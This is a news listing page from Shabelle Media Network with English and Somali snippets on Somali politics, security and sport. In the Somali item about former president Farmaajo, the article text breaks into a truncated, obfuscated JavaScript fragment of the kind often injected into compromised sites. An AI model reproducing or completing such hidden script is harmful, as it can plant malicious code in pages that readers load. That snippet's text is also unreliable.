Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Somali president meets UK FCDO Africa chief to deepen security, political cooperation

MOGADISHU, May 9 – Somali President Hassan Sheikh Mohamud on Thursday received Ms. Harriet Mathews, the UK Foreign, Commonwealth & Development Office (FCDO) Director General for Africa and the Americas, in Mogadishu for a high-level meeting aimed at strengthening bilateral relations and consolidating progress in Somalia’s security and political sectors.   According to the Somali presidency, the talks were “productive and...

Mareykanka oo ku bixinaya $10 milyan xog lagu soo qaban karo hogaamiye Al-Shabaab

NAIROBI, 8 May – Dowladda Mareykanka ayaa shaacisay in ay bixineyso abaalmarin gaaraysa ilaa $10 milyan oo doollar cid kasta oo keenta xog horseedi karta qabashada ama xukminta Cabdullaahi Banati, oo ah sarkaal sare oo ka tirsan kooxda Al-Shabaab.   Wasaaradda Arrimaha Dibadda ee Mareykanka ayaa Talaadadii sheegtay in Banati uu door weyn ka qaatay qorsheynta iyo fulinta weerarkii 5-tii Janaayo...

U.S. Offers $10 Mln Reward for al-Shabaab Leader Linked to Kenya Base Attack

NAIROBI, May 8 – The United States is offering a reward of up to $10 million for information leading to the arrest or conviction of Abdullahi Banati, a senior commander of the militant group al-Shabaab, who is accused of masterminding a deadly attack on a U.S. military base in Kenya in 2020.   The U.S. Department of State made the announcement...

Farmaajo Accuses Hassan Sheikh of Undermining Somalia’s Statebuilding Through Partisan Politics

Mogadishu, Somalia – May 8, 2025 - Former Somali President Mohamed Abdullahi Farmaajo has issued a sharp rebuke of current President Hassan Sheikh Mohamud, accusing him of compromising Somalia’s statebuilding process for political gain.   In a statement shared on social media, Farmaajo claimed that the National Consultative Council (NCC) — a key body formed to guide Somalia’s federalization and governance...

Farmaajo: Qorshaha Xasan Sheekh wuxuu halis ku yahay midnimadda umadda Soomaaliyeed

MUQDISHO, Soomaaliya - Madaxweynihii hore ee Soomaaliya Maxamed Cabdullahi Farmaajo ayaa soo saarey war-saxaafadeed uu dhaliilo ugu jeediyay Madaxweyne Xasan Sheekh Maxamuud.   Farmaajo ayaa damac waali ah ku tilmaamay qorshaha uu wado Madaxweynaha uu waqtigu kasii dhamaanayo ee Xasan Sheekh Maxamuud ee xukunka inuu gacantiisa kusoo aruuriyo iyo inuu u bedelo Gollaha Wadatashiga Qaran xisbi isagu leeyahay. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let...

Somalia’s National Consultative Council strikes new deal on security and elections

MOGADISHU, Somalia — Somalia’s National Consultative Council (NCC) on Wednesday night announced a new political understanding and renewed cooperation on national security and electoral processes following a multi-day summit in the capital, Mogadishu.   In a joint communiqué issued late in the evening, the council members affirmed their united stance in supporting the ongoing fight against terrorism and emphasized the urgent...

Golaha Wadatashiga Qaran oo heshiis cusub ka gaaray arrimaha amniga iyo doorashooyinka

MUQDISHO, Soomaaliya - Golaha Wadatashiga Qaran ayaa caawa soo saaray bayaan rasmi ah oo ka dhan ah shir dhowaan uga soo xirmay magaalada Muqdisho, kaasi oo nuxurkiisu ahaa isfaham siyaasadeed iyo xoojinta wada-shaqeynta ku saabsan amniga iyo geeddi-socodka doorashooyinka dalka.   Qodobada laga soo saaray shirkan ayaa si cad u muujinaya isku raaca xubnaha golaha in loo midoobo dagaalka ka dhanka...

Gudoomiyaha SoDMA oo daah-furay Mashruuc ku kacaya $40 million oo dollar

Gudoomiyaha Hay’adda Maareeynta Masiibooyinka (SoDMA) Mudane Maxamuud Macallin Cabdulle ayaa magaalada Naivasha ee Dalka Kenya si rasmi ah uga daah-furay Mashruuc ay ku kacayso lacag qiyaastii kor u dhaafaysa 40,000,000 afartan milyan oo doolar.   Mashruuca (WISER Action First - Eastern Africa) oo wadamada bariga Afrika looga taageeri doono sidii sare loogu qaadi lahaa awooda u adkeeysiga aafooyinka ee bulshada kuwa...

Kulanka Gollaha Shacabka oo Kooram La’aan u baaqday, Guddoomiyaha oo digniin diray

Muqdisho, 7 May 2025 – Kalfadhigii maanta ee Golaha Shacabka Baarlamaanka Federaalka Soomaaliya ayaa la hakiyay kaddib markii aan la helin kooramka loo baahan yahay si kulanku u furmo, sida uu xaqiijiyay xafiiska Guddoomiyaha Baarlamaanka.   Guddoomiyaha Golaha Shacabka, Sheekh Aadan Maxamed Nuur (Aadan Madoobe), ayaa si kulul uga hadlay maqnaanshaha xildhibaanada, isagoo ugu baaqay dhammaan xubnaha in ay si joogto...

Somali Parliament Adjourns Session Due to Lack of Quorum, Speaker Warns of Consequences

MOGADISHU, Somalia, May 7, 2025  – The Federal Parliament of Somalia was forced to adjourn its session on Wednesday after failing to reach the minimum number of lawmakers required to proceed, according to parliamentary sources.   The Speaker of the House of the People, Sheikh Adan Mohamed Nur, known as Adan Madobe, expressed deep frustration over the repeated absenteeism of members....

WARAR KALE

Somali PM Hails Referee Omar Artan as Symbol of Hope After World Cup Setback

MOGADISHU, Somalia — Somali Prime Minister Hamza Abdi Barre on Wednesday paid tribute to internationally recognized referee Omar Artan, saying the official's dream of...

Garsoore Cumar Cartan oo Muqdisho Dib ugu Soo Laabtay, Looguna Sameeyay Soo Dhaweyn Heer...

Muqdisho – Garsooraha caalamiga ah ee Soomaaliyeed, Cumar Cabdulqaadir Cartan, ayaa dib ugu soo laabtay magaalada Muqdisho, kadib markii loo diiday inuu galo dalka...

Safaaradda Soomaaliya ee Qatar oo Ka Qayb Gashay Xuska Maalinta Afrika ee Dooxa

DOOXA – Safaaradda Jamhuuriyadda Federaalka Soomaaliya ee magaalada Dooxa ayaa ka qayb gashay munaasabadda xuska Maalinta Afrika, taas oo ay soo qabanqaabiyeen Kooxda Safiirrada...